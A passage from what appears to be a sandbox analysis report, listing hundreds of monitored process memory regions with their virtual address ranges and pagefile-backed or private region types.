0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5706 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5707 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5708 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5709 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5710 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5711 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5712 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5713 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5714 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5715 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5716 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5717 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5718 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5719 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5720 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5721 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5722 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5723 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5724 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5725 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5726 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5727 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5728 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5729 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5730 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5731 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5732 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5733 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5734 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5735 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5736 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5737 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5738 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5739 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5740 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5741 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5742 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5743 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5744 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5745 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5746 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5747 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5748 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5749 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5750 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5751 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5752 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5753 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5754 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5755 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5756 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5757 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5758 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5759 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5760 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5761 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5762 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5763 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5764 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5765 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5766 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5767 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5768 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5769 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5770 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5771 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5772 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5773 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5774 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5775 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5776 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5777 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5778 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5779 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5780 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5781 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5782 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5783 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5784 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5785 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5786 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5787 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5788 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5789 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5790 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5791 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5792 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5793 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5794 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5795 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5796 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5797 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5798 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5799 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5800 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5801 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5802 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5803 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5804 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5805 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5806 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5807 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5808 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5809 start_va = 0x64e0000 end_va = 0x64f6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5810 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5811 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5812 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5813 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5814 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5815 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5816 start_va = 0x64e0000 end_va = 0x64f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5817 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5818 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5819 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5820 start_va = 0x72a0000 end_va = 0x779cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072a0000" filename = "" Region: id = 5821 start_va = 0x77a0000 end_va = 0x7c95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077a0000" filename = "" Region: id = 5822 start_va = 0x82d0000 end_va = 0x8352fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082d0000" filename = "" Region: id = 5823 start_va = 0x8360000 end_va = 0x83ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008360000" filename = "" Region: id = 5824 start_va = 0x82d0000 end_va = 0x835bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082d0000" filename = "" Region: id = 5825 start_va = 0x8360000 end_va = 0x83fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008360000" filename = "" Region: id = 5826 start_va = 0x8400000 end_va = 0x8494fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008400000" filename = "" Region: id = 5827 start_va = 0x82d0000 end_va = 0x8370fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082d0000" filename = "" Region: id = 5828 start_va = 0x8380000 end_va = 0x841afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008380000" filename = "" Region: id = 5829 start_va = 0x82d0000 end_va = 0x8373fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082d0000" filename = "" Region: id = 5830 start_va = 0x8380000 end_va = 0x8430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008380000" filename = "" Region: id = 5831 start_va = 0x8440000 end_va = 0x84f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008440000" filename = "" Region: id = 5832 start_va = 0x82d0000 end_va = 0x8381fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082d0000" filename = "" Region: id = 5833 start_va = 0x64e0000 end_va = 0x64effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 5834 start_va = 0x64e0000 end_va = 0x64fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 5835 start_va = 0x6500000 end_va = 0x650dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006500000" filename = "" Region: id = 5836 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5837 start_va = 0x72a0000 end_va = 0x779bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072a0000" filename = "" Region: id = 5838 start_va = 0x77a0000 end_va = 0x7c98fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077a0000" filename = "" Region: id = 5839 start_va = 0x8420000 end_va = 0x845ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008420000" filename = "" Region: id = 5840 start_va = 0x8460000 end_va = 0x849ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008460000" filename = "" Region: id = 5841 start_va = 0x84a0000 end_va = 0x84dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000084a0000" filename = "" Region: id = 5842 start_va = 0x84e0000 end_va = 0x851ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000084e0000" filename = "" Region: id = 5843 start_va = 0x8390000 end_va = 0x841afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008390000" filename = "" Region: id = 5844 start_va = 0x8520000 end_va = 0x85a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008520000" filename = "" Region: id = 5845 start_va = 0x85b0000 end_va = 0x8647fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085b0000" filename = "" Region: id = 5846 start_va = 0x8650000 end_va = 0x86e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008650000" filename = "" Region: id = 5847 start_va = 0x8520000 end_va = 0x85b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008520000" filename = "" Region: id = 5848 start_va = 0x85c0000 end_va = 0x8657fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085c0000" filename = "" Region: id = 5849 start_va = 0x8660000 end_va = 0x8707fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008660000" filename = "" Region: id = 5850 start_va = 0x8520000 end_va = 0x85c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008520000" filename = "" Region: id = 5851 start_va = 0x85d0000 end_va = 0x867ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085d0000" filename = "" Region: id = 5852 start_va = 0x8520000 end_va = 0x85c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008520000" filename = "" Region: id = 5853 start_va = 0x85d0000 end_va = 0x8682fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085d0000" filename = "" Region: id = 5854 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5855 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5856 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5857 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5858 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5859 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5860 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5861 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5862 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5863 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5864 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5865 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5866 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5867 start_va = 0x72a0000 end_va = 0x779bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072a0000" filename = "" Region: id = 5868 start_va = 0x77a0000 end_va = 0x7c9afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077a0000" filename = "" Region: id = 5869 start_va = 0x8390000 end_va = 0x841efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008390000" filename = "" Region: id = 5870 start_va = 0x8520000 end_va = 0x855ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008520000" filename = "" Region: id = 5871 start_va = 0x8560000 end_va = 0x859ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008560000" filename = "" Region: id = 5872 start_va = 0x8690000 end_va = 0x8715fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5873 start_va = 0x8720000 end_va = 0x87b5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008720000" filename = "" Region: id = 5874 start_va = 0x87c0000 end_va = 0x885bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087c0000" filename = "" Region: id = 5875 start_va = 0x8690000 end_va = 0x8722fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5876 start_va = 0x8730000 end_va = 0x87d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008730000" filename = "" Region: id = 5877 start_va = 0x8690000 end_va = 0x872efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5878 start_va = 0x8730000 end_va = 0x87dafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008730000" filename = "" Region: id = 5879 start_va = 0x87e0000 end_va = 0x888efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087e0000" filename = "" Region: id = 5880 start_va = 0x8690000 end_va = 0x8741fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5881 start_va = 0x8750000 end_va = 0x87fcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008750000" filename = "" Region: id = 5882 start_va = 0x72a0000 end_va = 0x779dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000072a0000" filename = "" Region: id = 5883 start_va = 0x77a0000 end_va = 0x7ca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000077a0000" filename = "" Region: id = 5884 start_va = 0x8390000 end_va = 0x8413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008390000" filename = "" Region: id = 5885 start_va = 0x8690000 end_va = 0x871afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5886 start_va = 0x8390000 end_va = 0x8424fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008390000" filename = "" Region: id = 5887 start_va = 0x8690000 end_va = 0x8729fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5888 start_va = 0x8390000 end_va = 0x8423fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008390000" filename = "" Region: id = 5889 start_va = 0x8690000 end_va = 0x8730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 5890 start_va = 0x8390000 end_va = 0x842efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008390000" filename = "" Region: id = 5891 start_va = 